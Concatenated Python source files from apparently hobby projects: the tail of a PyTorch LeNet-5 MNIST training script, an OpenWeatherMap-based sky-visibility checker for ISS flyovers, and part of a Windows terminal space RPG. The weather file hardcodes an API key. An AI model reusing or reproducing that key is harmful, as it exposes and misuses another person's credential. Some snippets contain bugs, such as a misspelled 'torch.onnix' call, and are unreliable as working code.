'model':\n model = torch.load(args.pre_trained_weights)\n elif args.pre_trained_type == 'params':\n model = Lenet5Model(args.input_channels)\n model.load_state_dict(torch.load(args.pre_trained_weights))\n else:\n print(f\"Model type {args.pre_trained_type} not known\")\n return None, None, None\n elif extension == '.onnx':\n model = torch.onnx.load(args.pre_trained_weights)\n torch.onnix.checker.check_model(model)\n elif extension == '.weights':\n model = Lenet5Model(args.input_channels)\n load_weights(model, args.pre_trained_weights)\n else:\n print(\"un-known data file: \", args.pre_trained_weights);\n return None, None, None\n optimizer = SGD(model.parameters(), lr=args.learning_rate)\n cross_error = CrossEntropyLoss() # loss function\n return model, optimizer, cross_error\n\n#-------------------------------------------------------------------------------\ndef train_one_mini_batch( args\n , model\n , images # input images\n , labels # expected label for the input images\n , cross_error # error function\n , optimizer # otptimizer\n ):\n \"\"\"\n It runs a train on a mini-batch, which consists of a number of images.\n \"\"\"\n predicts = model(images.float())\n error = cross_error(predicts, labels.long()) # CrossEntropyLoss(calculated, expected)\n optimizer.zero_grad()\n error.backward() # loss\n optimizer.step()\n return error\n\n#-------------------------------------------------------------------------------\ndef evaluate_one_mini_batch( args\n , model\n , images # input images\n , labels # expected label\n ):\n \"\"\"\n It runs an evaluation on a mini-batch, which consists of a number of images.\n \"\"\"\n predicts = model(images.float()).detach()\n predicts_ys = np.argmax(predicts, axis=-1) # get id of max value\n matched = predicts_ys == labels\n correct = np.sum(matched.numpy(), axis=-1) # num of mached\n sum = matched.shape[0] # number of items (images) in the mini-batch\n return correct, sum\n\n#-------------------------------------------------------------------------------\ndef save_checkpoint( args\n , model\n , accuracy\n , epoch\n ):\n \"\"\"\n It ssave 'checkpoint' if required.\n It return 'True' for end-condition.\n \"\"\"\n if not hasattr(save_checkpoint, \"accuracy_old\"):\n save_checkpoint.accuracy_old = 0\n if accuracy>accuracy_old:\n torch.save(model, f\"{args.checkpoints}{os.sep}mnist_model_{accuracy:.3f}.pth\")\n torch.save(model.state_dict(), f\"{args.checkpoints}{os.sep}mnist_params_{accuracy:.3f}.pth\")\n dummy_input = torch.randn(1, args.input_channels, 32, 32, requires_grad=True)\n #batch_size, input_channel, input_height, input_width\n torch.onnx.export(model, dummy_input,\n f\"{args.checkpoints}{os.sep}mnist_model_{accuracy:.3f}.onnx\")\n if (not args.keep) and (f\"{accuracy_old:.3f}\" != f\"{accuracy:.3f}\"):\n pathX = f\"{args.checkpoints}{os.sep}mnist_model_{accuracy_old:.3f}.pth\"\n if os.path.exists(pathX): os.remove(pathX)\n pathX = f\"{args.checkpoints}{os.sep}mnist_params_{accuracy_old:.3f}.pth\"\n if os.path.exists(pathX): os.remove(pathX)\n pathX = f\"{args.checkpoints}{os.sep}mnist_model_{accuracy_old:.3f}.onnx\"\n if os.path.exists(pathX): os.remove(pathX)\n pathX = f\"{args.checkpoints}{os.sep}mnist_{accuracy_old:.3f}.weights\"\n if os.path.exists(pathX): os.remove(pathX)\n save_checkpoint.accuracy_old = accuracy\n \n if (float(accuracy)>=float(args.accuracy)):\n torch.save(model, f\"{args.checkpoints}{os.sep}mnist_model_final.pth\")\n torch.save(model.state_dict(), f\"{args.checkpoints}{os.sep}mnist_params_final.pth\")\n dummy_input = 
torch.randn(1, args.input_channels, 32, 32, requires_grad=False)\n torch.onnx.export(model, dummy_input, '{}/mnist_model_final.onnx'.format(args.checkpoints))\n save_weights(model, f\"{args.checkpoints}{os.sep}mnist_final.weights\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_final.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_params_final.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_final.onnx\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_final.weights\")\n return True\n elif epoch == (args.epochs-1):\n torch.save(model, f\"{args.checkpoints}{os.sep}mnist_model_last.pth\")\n torch.save(model.state_dict(), f\"{args.checkpoints}{os.sep}mnist_params_last.pth\")\n dummy_input = torch.randn(1, args.input_channels, 32, 32, requires_grad=False)\n torch.onnx.export(model, dummy_input, '{}/mnist_model_last.onnx'.format(args.checkpoints))\n save_weights(model, f\"{args.checkpoints}{os.sep}mnist_last.weights\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_last.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_param_last.pth\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_model_last.onnx\")\n print(f\"Look {args.checkpoints}{os.sep}mnist_last.weights\")\n return False\n\n#-------------------------------------------------------------------------------\nif __name__ == '__main__':\n def get_args():\n parser = argparse.ArgumentParser(description='PyTorch LeNet-5')\n parser.add_argument('-i', '--input_channels', type=int, default=1,\n metavar='input_channels',\n help='input channel size (default: 1)')\n parser.add_argument('-b', '--batch_size', type=int, default=100, # 60,000/100=600 iteration==> one epoch\n metavar='batch_size',\n help='input batch size (default: 100)')\n parser.add_argument('-e', '--epochs', type=int, default=100,\n metavar='epochs',\n help='number of epochs to train (default: 100)')\n parser.add_argument('-l', '--learning_rate', type=float, default=0.1,\n metavar='learning_rate',\n help='learning rate (default: 0.1)')\n parser.add_argument('-a', '--accuracy', type=float, default=0.99,\n metavar='accuracy',\n help='accuracy (default: 0.99)')\n parser.add_argument('-c', '--checkpoints', type=str, default=\"checkpoints\",\n metavar='checkpoints',\n help='directory name for checkpoint (default: checkpoints)')\n parser.add_argument('-t', '--pre_trained_type', type=str\n ,choices=[\"params\", \"model\", \"weights\", \"none\"]\n ,default=\"none\"\n ,metavar='type'\n ,help='type of pre-trained weights: \\\"model\\\", \\\"params\\\", \\\"weights\\\", or \\\"none\\\" (default: \\\"model\\\")')\n parser.add_argument('-w', '--pre_trained_weights', type=str, default=\"checkpoints/mnist_params_final.pth\",\n metavar='file_name',\n help=\"pre-trained weight or model path_file_name for checkpoint when '--type' is not none (default: checkpoints/mnist_final.pth)\")\n parser.add_argument('-g', '--logdir', type=str, default=\"tensorboard\",\n metavar='logdir',\n help='directory name for log (default: tensorboard)')\n parser.add_argument('-k', '--keep', action='store_true',\n help='make keep intermediate weights (default: False)')\n parser.add_argument('-r', '--rigor', action='store_true',\n help='set rigor (default: False)')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='make verbose (default: False)')\n parser.add_argument('-d', '--debug', action='store_true',\n help='make debug (default: False)')\n args = parser.parse_args()\n return args\n\n#-------------------------------------------------------------------------------\nif 
__name__ == '__main__':\n args = get_args()\n\n if not os.path.exists(args.checkpoints): os.makedirs(args.checkpoints)\n\n train_loader, test_loader = get_dataset( args )\n model, optimizer, cross_error = build_model( args )\n model.train() # let the model know it is training, i.e., it sets the mode to train\n\n if args.debug:\n items = list(model.__dict__['_modules'].items())[0][1]\n print(f\"{items[0].__class__.__name__}.bias.data={items[0].bias.data}\")\n\n if os.path.isdir(args.logdir): shutil.rmtree(args.logdir)\n os.makedirs(args.logdir)\n log = SummaryWriter(args.logdir)\n log.add_graph(model, torch.rand(args.batch_size, args.input_channels, 32, 32))\n\n if args.debug:\n print(f\"{items[0].__class__.__name__}.bias.data={items[0].bias.data}\")\n\n if args.verbose:\n # Print model and optimizer and cross_error\n print(model)\n print(model.__dict__['_modules'])\n print(optimizer)\n print(cross_error)\n # Print model's state_dict\n print(\"Model's state_dict:\")\n for param_tensor in model.state_dict():\n print(param_tensor, \"\\t\", model.state_dict()[param_tensor].size())\n\n # Print optimizer's state_dict\n print(\"Optimizer's state_dict:\")\n for var_name in optimizer.state_dict():\n print(var_name, \"\\t\", optimizer.state_dict()[var_name])\n\n accuracy_old=0\n for epoch in range(args.epochs):\n for idx, (train_x, train_label) in enumerate(train_loader):\n # idx: 0 to (num of mini-batches 600,000/100 -1 )[0:599]\n # train_x: 100 images of size 32x32\n # train_label: 100 elements\n model.train() # set the mode to train\n error = train_one_mini_batch(args, model, train_x, train_label, cross_error, optimizer)\n if idx % (args.batch_size) == 0: # print error after each batch\n print('idx: {}, error: {}'.format(idx, error))\n\n correct = 0\n sum = 0\n for idx, (test_x, test_label) in enumerate(test_loader):\n model.eval() # set the mode to evaluate (not to train)\n c, s = evaluate_one_mini_batch(args, model, test_x, test_label)\n correct += c # accumulate the num of mached\n sum += s # accumulate the number of items\n accuracy = correct/sum # ratio of correct from sum\n print(f\"epoch: {epoch}, accuracy: {accuracy}\")\n print(\"----------------------------------\")\n\n log.add_scalar('Train/accuracy', accuracy, epoch)\n log.add_scalar('Train/error', error, epoch)\n\n if save_checkpoint(args, model, accuracy, epoch):\n break\n\n log.export_scalars_to_json(args.logdir + os.sep + \"all_logs.json\")\n log.close()\n\n#===============================================================================\n# Revision history:\n#\n# 2020.10.01: Started by Ando Ki (adki@future-ds.com)\n#===============================================================================\n","repo_name":"adki/DLR_Projects","sub_path":"LeNet-5/LeNet-5.pytorch/src/lenet5_train.py","file_name":"lenet5_train.py","file_ext":"py","file_size_in_byte":14936,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"14036220159","text":"from astral import LocationInfo\nfrom astral.sun import sun\nimport datetime\nimport pyowm\nimport time\n# Libraries needed to run this class.\n\nowm = pyowm.OWM(\"fc1d78e5bdb6e3e613600e91faa22e79\")\nmgr = owm.weather_manager()\n# Stuff needed for OpenWeatherMap to work, including a subscription code.\n\n\nclass WeatherService:\n def __init__(self, latitude, longitude, unix):\n self.lat = latitude\n self.lon = longitude\n self.unix = int(unix)\n # Class is asking for a latitude, longitude, and unix timestamp for the ISS's flyover.\n\n self.now = 
time.time()\n self.hours = int((self.unix - self.now) / 3600)\n self.days = int((self.unix - self.now) / 86400)\n # Hours and days from now.\n\n self.year = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%Y\"))\n self.month = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%m\"))\n self.day = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%d\"))\n self.minute = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%M\"))\n self.hour = int(datetime.datetime.fromtimestamp(self.unix).strftime(\"%H\"))\n if self.minute >= 30:\n self.hour += 1\n # The year, month and day of the inputted unix timestamp.\n\n self.one_call = mgr.one_call(lat=self.lat, lon=self.lon)\n self.cloudiness = int()\n # Location and cloud stuff for using OpenWeatherMap with PyOWM.\n\n self.loc = LocationInfo(timezone=\"Europe/London\", latitude=self.lat, longitude=self.lon)\n self.s = sun(self.loc.observer, date=datetime.date(self.year, self.month, self.day))\n # Location info stuff needed to find out when the sun goes up and down (thank you StackOverflow).\n self.sunup = str()\n self.sundown = str()\n self.uphour = int()\n self.downhour = int()\n # Sun up/down stuff.\n\n self.visible = False\n # Making the assumption that the night sky isn't visible.\n\n def clearsky(self):\n if self.hours < 0:\n return \"Error: Negative timestamp\"\n # If the unix timestamp is in the past.\n\n elif 0 <= self.hours <= 47:\n self.cloudiness = int(self.one_call.forecast_hourly[self.hours].clouds)\n # If the unix timestamp is within 48 hours from now, we can get an hourly cloud check.\n\n elif self.days <= 6:\n self.cloudiness = int(self.one_call.forecast_daily[self.days].clouds)\n # If the unix timestamp is greater than 48 hours from now, we can get daily cloud checks for up to 7 days from\n # now.\n\n else:\n return \"Error: Timestamp too far into the future\"\n # We can't get any weather data further than a week from now.\n\n self.sunup = str(self.s[\"sunrise\"]).split(\" \")[1].split(\".\")[0]\n self.sundown = str(self.s[\"sunset\"]).split(\" \")[1].split(\".\")[0]\n # Getting the time (hours:minutes:seconds) of sunset and sunrise on the day of the unix timestamp.\n\n self.uphour = int(self.sunup.split(\":\")[0])\n if int(self.sunup.split(\":\")[1]) >= 30:\n self.uphour += 1\n # Getting the time of sunrise rounded to nearest hour.\n\n self.downhour = int(self.sundown.split(\":\")[0])\n if int(self.sundown.split(\":\")[1]) >= 30:\n self.downhour += 1\n # Getting the time of sunset rounded to nearest hour.\n\n if self.cloudiness < 25 and (self.uphour > self.hour or self.downhour < self.hour):\n self.visible = True\n # If there is less than 25% clouds and the unix time is before sunrise or after sunset.\n\n return self.visible\n # Return a bool. True if the nightsky is visible.\n\n\naarhus = WeatherService(56.158150, 10.212030, 1644500918)\n\nprint(aarhus.clearsky())\n","repo_name":"emiln2002/ISS_tracker","sub_path":"WeatherService.py","file_name":"WeatherService.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1711401337","text":"# test.py - a test build of a new and improved terminal RPG engine\r\n'''\r\n Implement TODO:\r\n -local multiplayer combat isn't working. Sockets are hard, who knew?\r\n Probably won't get finished since it's a huge hassle for such little\r\n return but it was close! It worked locally at least, so that's cool. 
\r\n I'll probably keep the local element just for demonstration purposes.\r\n'''\r\nfrom msvcrt import getch\r\nimport sys\r\nimport os\r\nimport socket\r\nimport textwrap\r\nimport random\r\nimport ast\r\n\r\nimport faces\r\nfrom client import clientData\r\nfrom data import mapData\r\nfrom data import playerData\r\nfrom data import enemyData\r\nfrom data import enemyClass\r\nfrom maps import gamePlayMaps\r\nfrom maps import staticMaps\r\nfrom mapChange import changeMap\r\nimport subprocess\r\n\r\n\r\n\r\n## Runs game opening text of story and controls\r\nimport open_text\r\n\r\n\r\n\r\n\r\n####################################\r\n##### GLOBAL DATA #####\r\n####################################\r\n\r\nclass globalStates():\r\n\r\n ## gold won in combat to be printed later\r\n won_gold = 0\r\n \r\n # Gameplay map currently being rendered\r\n current_map = gamePlayMaps.map1\r\n \r\n # Gameplay commands used from player input for map - first assigned at runtime\r\n current_commands = None\r\n \r\n # Map to return to from pause menu\r\n return_map = None\r\n\r\n ## List of static maps for referencing in play loop\r\n static_maps = [staticMaps.menu, staticMaps.console_menu, \r\n staticMaps.shop_menu, staticMaps.upgrade_menu,\r\n staticMaps.multiplayer_menu]\r\n combat_maps = [staticMaps.combat_map_enemy, staticMaps.combat_map_pl]\r\n\r\n\r\n\r\n####################################\r\n##### MAP FUNCTIONS #####\r\n####################################\r\n\r\ndef overwrite_map(w_map):\r\n \r\n for i in range(len(w_map)):\r\n for j in range(len(w_map[0])):\r\n if w_map[i][j] == 'X':\r\n w_map[i][j] = ' '\r\n\r\n\r\ndef print_map(p_map):\r\n\r\n ## Print player data at top of map\r\n print(f'\\n HP: {str(playerData.HP)}/{str(playerData.MAX_HP)} G: {str(playerData.GOLD)}')\r\n\r\n ## Print the Map\r\n for i in range(len(p_map)):\r\n for j in range(len(p_map[0])):\r\n print(p_map[i][j], end='')\r\n print()\r\n\r\n\r\ndef print_combat_screen(turn):\r\n\r\n ## Set map to players turn\r\n if turn == 1 or turn == 0:\r\n globalStates.current_map = staticMaps.combat_map_pl\r\n if turn == 2:\r\n globalStates.current_map = staticMaps.combat_map_enemy\r\n ## Print the map\r\n print(globalStates.current_map)\r\n\r\n\r\n ## print combatants health\r\n print(f' HP: {playerData.HP}/{playerData.MAX_HP} {enemyData.current_enemy.rank} {enemyData.current_enemy.name}: {enemyData.current_enemy.hp}')\r\n if turn == 0:\r\n print(f'\\n\\t[1] Laser Cannon\\n\\t[2] Missile ({str(playerData.MISSILES)})\\n\\t[3] Repairkit ({str(playerData.REPAIRKITS)})')\r\n\r\n\r\n\r\n\r\n###################################\r\n###### DIALOGUE / CONVO ######\r\n##################################\r\n\r\ndef dialoguePrompt(face, messages):\r\n print_face = face\r\n print_message = random.choice(messages)\r\n\r\n clear()\r\n print(f'\\t\\n {enemyData.current_enemy.rank} {enemyData.current_enemy.name} says:')\r\n print(random.choice(print_face))\r\n text = textwrap.wrap(print_message, 25)\r\n for j in range(len(text)):\r\n print(text[j].center(36))\r\n getch()\r\n\r\n\r\n# ### cut ###\r\n# def speakableList(cur_map):\r\n\r\n# ##### MAP 2 #####\r\n# ## GIRL\r\n# if cur_map == gamePlayMaps.map2:\r\n# if (cur_map[mapData.pos_x][mapData.pos_y+1] == 'Q') or \\\r\n# (cur_map[mapData.pos_x][mapData.pos_y-1] == 'Q'):\r\n# dialoguePrompt(faces.girl.face, faces.girl.messages)\r\n\r\n\r\n\r\n\r\n\r\n##################################################\r\n###### FUNCTIONALITY AND GAMEPLAY ######\r\n##################################################\r\n\r\ndef 
clear():\r\n os.system('cls')\r\n\r\n\r\n\r\n################################################\r\n####### INPUT AND COMMANDS #######\r\n################################################\r\n\r\n\r\n## This is the bulk of movement control. This command-function holds the main inputs\r\n# by players and does collision detection before making the move. If the move is through\r\n# a door, this is handled by the if/else blocks inside the cmd='' blocks. It basically\r\n# checks if the move is going to be into a door, and if it is, it returns True. This is\r\n# returned in the main loop, where a true return results in that info being sent to another\r\n# function to load the map in. \r\ndef map_commands(cmd, cur_map):\r\n \r\n if cmd == 'w' and cur_map[mapData.pos_x - 1][mapData.pos_y] not in mapData.walls:\r\n if cur_map[mapData.pos_x - 1][mapData.pos_y] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_x -= 1\r\n \r\n elif cmd == 's' and cur_map[mapData.pos_x + 1][mapData.pos_y] not in mapData.walls:\r\n if cur_map[mapData.pos_x + 1][mapData.pos_y] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_x += 1\r\n \r\n elif cmd == 'a' and cur_map[mapData.pos_x][mapData.pos_y - 1] not in mapData.walls:\r\n if cur_map[mapData.pos_x][mapData.pos_y - 1] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_y -= 2\r\n \r\n elif cmd == 'd' and cur_map[mapData.pos_x][mapData.pos_y + 1] not in mapData.walls:\r\n if cur_map[mapData.pos_x][mapData.pos_y + 1] in mapData.doors:\r\n return True\r\n else:\r\n mapData.pos_y += 2\r\n \r\n\r\n ## exit command\r\n elif cmd == '\\x1b':\r\n clear()\r\n print('\\n\\n > EXIT? [ENTER] TO CONFIRM')\r\n confirmation = bytes.decode(getch())\r\n\r\n if confirmation == '\\r':\r\n sys.exit(0)\r\n else:\r\n pass\r\n \r\n\r\n # ## Enter on command console\r\n elif cmd == '\\r' and tuple((mapData.pos_x, mapData.pos_y)) in mapData.command_console_positions:\r\n globalStates.current_commands = console_commands\r\n globalStates.return_map = globalStates.current_map\r\n globalStates.current_map = staticMaps.console_menu\r\n\r\n ## shop console\r\n elif cmd == '\\r' and tuple((mapData.pos_x, mapData.pos_y)) in mapData.shop_console_positions:\r\n globalStates.current_commands = shop_commands\r\n globalStates.return_map = globalStates.current_map\r\n globalStates.current_map = staticMaps.shop_menu\r\n\r\n ## upgrade console\r\n elif cmd == '\\r' and tuple((mapData.pos_x, mapData.pos_y)) in mapData.upgrade_console_positions:\r\n globalStates.current_commands = upgrade_commands\r\n globalStates.return_map = globalStates.current_map\r\n globalStates.current_map = staticMaps.upgrade_menu\r\n\r\n\r\n\r\n \r\n\r\ndef console_commands(cmd, cur_map):\r\n \r\n ## Combat\r\n if cmd == '1': \r\n\r\n ### initialize enemy to fight ###\r\n ## Random rank var\r\n rank = random.choice(enemyData.ranks)\r\n \r\n ## Random name var\r\n name = random.choice(enemyData.names)\r\n\r\n\r\n ## randomize hp and basedam \r\n ## These are calculated based on the players current stat level\r\n ## --prone to tweaking, balance is still in progress\r\n en_hp = random.randint(int(round(playerData.STATS / 5)), int(round(playerData.STATS / 2.5))) + 6\r\n en_basedam = random.randint(int(round(playerData.STATS / 25)), int(round(playerData.STATS / 18)))\r\n \r\n ## if the base damage is rounded down to 0, set to 1- enemeies need to always do damage\r\n if en_basedam < 1:\r\n en_basedam = 1\r\n\r\n \r\n ## initialize randomized enemy instance, assign its above info and add the face and messages\r\n 
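        ## e.g. with playerData.STATS == 50, the rolls above give en_hp = randint(10, 20) + 6 and en_basedam = randint(2, 3)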
enemyData.current_enemy = enemyClass(rank, name, en_hp, en_basedam, faces.shopkeeper.face, faces.shopkeeper.messages)\r\n \r\n ## enemy speaks before combat\r\n dialoguePrompt(enemyData.current_enemy.face, enemyData.current_enemy.messages)\r\n\r\n ## combat map/cmds\r\n globalStates.current_commands = combat_commands\r\n globalStates.current_map = staticMaps.combat_map_enemy\r\n\r\n # player gold reward for victory assigned beforehand so sue me. if you die you lose anyway \r\n won_gold = int(round(enemyData.current_enemy.hp / 2)) + random.randint(2, 8)\r\n playerData.STATS += int(round(enemyData.current_enemy.hp / 8)) ### maybe just make it like 2 or 3 \r\n playerData.GOLD += won_gold\r\n globalStates.won_gold = won_gold\r\n\r\n\r\n ## goto SOCKET MULTIPLAYER\r\n elif cmd == '2': \r\n globalStates.current_map = staticMaps.multiplayer_menu\r\n globalStates.current_commands = multiplayer_lobby_commands\r\n \r\n \r\n ## SAVE \r\n elif cmd == '3':\r\n clear()\r\n save_game()\r\n\r\n ## LOAD\r\n elif cmd == '4':\r\n clear()\r\n load_game()\r\n\r\n else:\r\n globalStates.current_map = globalStates.return_map\r\n globalStates.current_commands = map_commands\r\n\r\n\r\ndef shop_commands(cmd, cur_map):\r\n\r\n gp = playerData.GOLD\r\n no_gp = '\\n ** NOT ENOUGH GOLD **'\r\n\r\n if cmd == '1':\r\n if gp >= 10:\r\n playerData.REPAIRKITS += 1\r\n print('\\n +REPAIRKIT PURCHASED+')\r\n\r\n playerData.GOLD -= 10\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n\r\n elif cmd == '2':\r\n if gp >= 10:\r\n playerData.MISSILES += 1\r\n print('\\n +MISSILE PURCHASED+')\r\n \r\n playerData.GOLD -= 10\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n else:\r\n globalStates.current_commands = map_commands\r\n globalStates.current_map = globalStates.return_map\r\n\r\n\r\ndef upgrade_commands(cmd, cur_map):\r\n\r\n gp = playerData.GOLD\r\n no_gp = '\\n ** NOT ENOUGH GOLD **'\r\n \r\n if cmd == '1':\r\n if gp >= 20:\r\n playerData.CANNON_DAM += 1\r\n print('\\n +CANNON UPGRADED +')\r\n\r\n playerData.GOLD -= 20\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n\r\n elif cmd == '2':\r\n if gp >= 15:\r\n playerData.MAX_HP += 5\r\n playerData.HP = playerData.MAX_HP\r\n print('\\n +SHIELD UPGRADED +')\r\n\r\n playerData.GOLD -= 15\r\n playerData.STATS += 1\r\n getch()\r\n\r\n else:\r\n print(no_gp)\r\n getch()\r\n\r\n else:\r\n globalStates.current_commands = map_commands\r\n globalStates.current_map = globalStates.return_map\r\n\r\n\r\n\r\ndef multiplayer_lobby_commands(cmd, cur_map):\r\n \r\n ## JOIN SERVER\r\n if cmd == '1':\r\n clear()\r\n\r\n ## input port #\r\n port = input('\\n\\n\\t!-SAVE YOUR GAME BEFORE CONNECTING\\n\\n\\t>> ENTER SERVERS PORT NUMBER\\n\\t>> ')\r\n \r\n if port == '':\r\n pass\r\n \r\n ## if port is too high or low, return to menu\r\n elif int(port) > 65000 or int(port) < 6000:\r\n print('\\n\\t>> THIS PORT NUMBER IS OUT OF VALID RANGE <<')\r\n getch()\r\n\r\n ## try to validate port and connect\r\n else:\r\n clear()\r\n connected = False\r\n \r\n HOST = '127.0.0.1'\r\n \r\n clientData.PORT = int(port)\r\n CLIENT = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n ## Attempt connection. 
If refused or failed to connect, report to player\r\n try:\r\n CLIENT.connect((HOST, int(port)))\r\n connected = True\r\n\r\n except ConnectionRefusedError:\r\n clear()\r\n print('\\n\\n\\t>> CONNECTION REFUSED <<\\n\\n\\t port may be invalid')\r\n getch()\r\n \r\n if connected:\r\n \r\n ## assign player variables to vars in client data\r\n clientData.PL_HP = playerData.HP\r\n clientData.PL_MAX_HP = playerData.MAX_HP\r\n clientData.PL_DAM = playerData.CANNON_DAM\r\n clientData.PL_MISSILES = playerData.MISSILES\r\n clientData.PL_REPAIRKITS = playerData.REPAIRKITS\r\n \r\n ## Connect to server and send player stats\r\n try:\r\n clientData.client_connect(CLIENT)\r\n clientData.send_stats(CLIENT)\r\n\r\n except ConnectionResetError:\r\n print('\\n\\t>> CONNECTION LOST\\n\\t>> SERVER MAY HAVE CRASHED OR BEEN CLOSED')\r\n getch()\r\n return\r\n\r\n ## run game loop\r\n loot_plus = clientData.main_loop(CLIENT)\r\n\r\n ## Get loot\r\n playerData.GOLD += loot_plus\r\n\r\n getch()\r\n\r\n ## run client commands, let client.py take over here\r\n\r\n\r\n ## RUN SERVER ##\r\n elif cmd == '2':\r\n\r\n clear()\r\n\r\n ## print port data and help\r\n print('''\r\n [*] PORT MUST BE BELOW 65000 AND OVER 6000.\r\n IF PORT IS VALID, SERVER WILL OPEN IN A \r\n NEW TERMINAL WINDOW AND RUN IN THE BACK-\r\n GROUND. AFTER CREATING SERVER, BOTH THE\r\n PLAYERS MUST CONNECT FROM PREVIOUS MENU. \r\n ''')\r\n\r\n ## get port #\r\n port = input('\\n\\n\\t>> ENTER A VALID PORT NUMBER\\n\\t>> ')\r\n\r\n ## break by entering nothing\r\n if port == '':\r\n pass\r\n \r\n ## if port is too high or low, return to menu\r\n elif int(port) > 65000 or int(port) < 6000:\r\n print('\\n\\t>> THIS PORT NUMBER IS OUT OF VALID RANGE <<')\r\n getch()\r\n\r\n ## otherwise run server with port num as cmdline argument\r\n else:\r\n ## get current dir for filepath to run server\r\n dir_path = os.getcwd()\r\n ## run server. start is the command, cmd is the window, /K means open and keep it open\r\n os.system('start cmd /K ' + dir_path + '\\\\server.py ' + port)\r\n\r\n else:\r\n globalStates.current_commands = console_commands\r\n globalStates.current_map = staticMaps.console_menu\r\n\r\n\r\n\r\ndef combat_commands(cmd, cur_map):\r\n\r\n turn_completed = False\r\n\r\n ## generate random number for critical roll. If 1, player misses attack. 
If 20, player does heavier critical attack\r\n critical_generator = random.randint(1,20)\r\n\r\n ## Cannon ##\r\n if cmd == '1':\r\n\r\n if critical_generator == 1:\r\n\r\n clear()\r\n print_combat_screen(1)\r\n print(f'\\n\\tYour Attack MISSES')\r\n getch()\r\n\r\n elif critical_generator == 20:\r\n \r\n ## Generate random critical damage amount from 1.5x player cannondam to 2x\r\n crit_damage = random.randint(int(round(playerData.CANNON_DAM * 1.5)), int(round(playerData.CANNON_DAM * 2.5))) + random.randint(1,4)\r\n\r\n ## Remove damage amt from enemy HP\r\n enemyData.current_enemy.hp -= crit_damage\r\n\r\n # Check if enemy health is less than 0, and set it to 0 if so- no Negative HP on screen!\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n\r\n clear()\r\n\r\n # Update screen with damage results\r\n print_combat_screen(1)\r\n print(f'\\n\\tCritical Cannon hit for {str(crit_damage)} dam!')\r\n getch()\r\n\r\n else:\r\n # Generate randomized damage number from player base damage and a +4 upper range\r\n damage = random.randint(playerData.CANNON_DAM, playerData.CANNON_DAM + 4)\r\n\r\n # Remove damage number from enemy HP\r\n enemyData.current_enemy.hp -= damage\r\n\r\n # Check if enemy health is less than 0, and set it to 0 if so- no Negative HP on screen!\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n\r\n clear()\r\n\r\n # Update screen with damage results\r\n print_combat_screen(1)\r\n print(f'\\n\\tCannon does {str(damage)} dam')\r\n getch()\r\n\r\n # Continue to enemy turn\r\n turn_completed = True\r\n\r\n\r\n ## Missiles ##\r\n elif cmd == '2':\r\n\r\n # Use missile if avaliable\r\n if playerData.MISSILES > 0:\r\n \r\n ## subtract missile from inventory\r\n playerData.MISSILES -= 1\r\n\r\n\r\n if critical_generator == 1:\r\n\r\n print_combat_screen(1)\r\n print(f'\\n\\tYour Missile MISSES')\r\n getch()\r\n\r\n elif critical_generator == 20:\r\n \r\n ## Generate random critical damage amount from 1.5x player cannondam to 2x\r\n crit_damage = random.randint(int(round(playerData.CANNON_DAM * 2.5)), int(round(playerData.CANNON_DAM * 4.5))) + random.randint(3,8)\r\n\r\n ## Remove damage amt from enemy HP\r\n enemyData.current_enemy.hp -= crit_damage\r\n\r\n # Check if enemy health is less than 0, and set it to 0 if so- no Negative HP on screen!\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n\r\n clear()\r\n\r\n # Update screen with damage results\r\n print_combat_screen(1)\r\n print(f'\\n\\tCritical Missile hit for {str(crit_damage)} dam!')\r\n getch()\r\n \r\n else:\r\n ## Generate random number. Missile damage starts at +4 player basedamage and goes up to +9 added. 
Powerful shit.\r\n damage = random.randint(playerData.CANNON_DAM + 4, playerData.CANNON_DAM + 9)\r\n\r\n # Subtract missile damage from enemy HP\r\n enemyData.current_enemy.hp -= damage\r\n\r\n # No negative HP on screen.\r\n if enemyData.current_enemy.hp < 0:\r\n enemyData.current_enemy.hp = 0\r\n \r\n clear()\r\n\r\n ## Print damage report to screen\r\n print_combat_screen(1)\r\n print(f'\\n\\tMissile does {str(damage)} dam')\r\n getch()\r\n\r\n # Continue to enemy turn\r\n turn_completed = True\r\n \r\n # Otherwise, too bad sonnyboy.\r\n else:\r\n print('\\t** NO MISSILES **')\r\n getch()\r\n\r\n\r\n ## Repair ##\r\n elif cmd == '3':\r\n\r\n # Check for repairkit in inventory and that your health isn't maxed already.\r\n if playerData.REPAIRKITS > 0 and playerData.HP == playerData.MAX_HP:\r\n print('\\t** HEALTH MAXIMUM **')\r\n getch()\r\n\r\n # Otherwise, go through with repair-\r\n elif playerData.REPAIRKITS > 0:\r\n \r\n # Remove RKit from inventory\r\n playerData.REPAIRKITS -= 1\r\n\r\n ## calculate repairkit amount\r\n repair_amount = 10 + int(round(playerData.STATS * .08))\r\n\r\n ## If player health plus repairkit is more than their max hp, just make it equal max hp\r\n if (playerData.HP + repair_amount) > playerData.MAX_HP:\r\n playerData.HP = playerData.MAX_HP\r\n \r\n ## Otherwise add the repair amount to their HP\r\n else:\r\n playerData.HP += repair_amount\r\n\r\n clear()\r\n\r\n 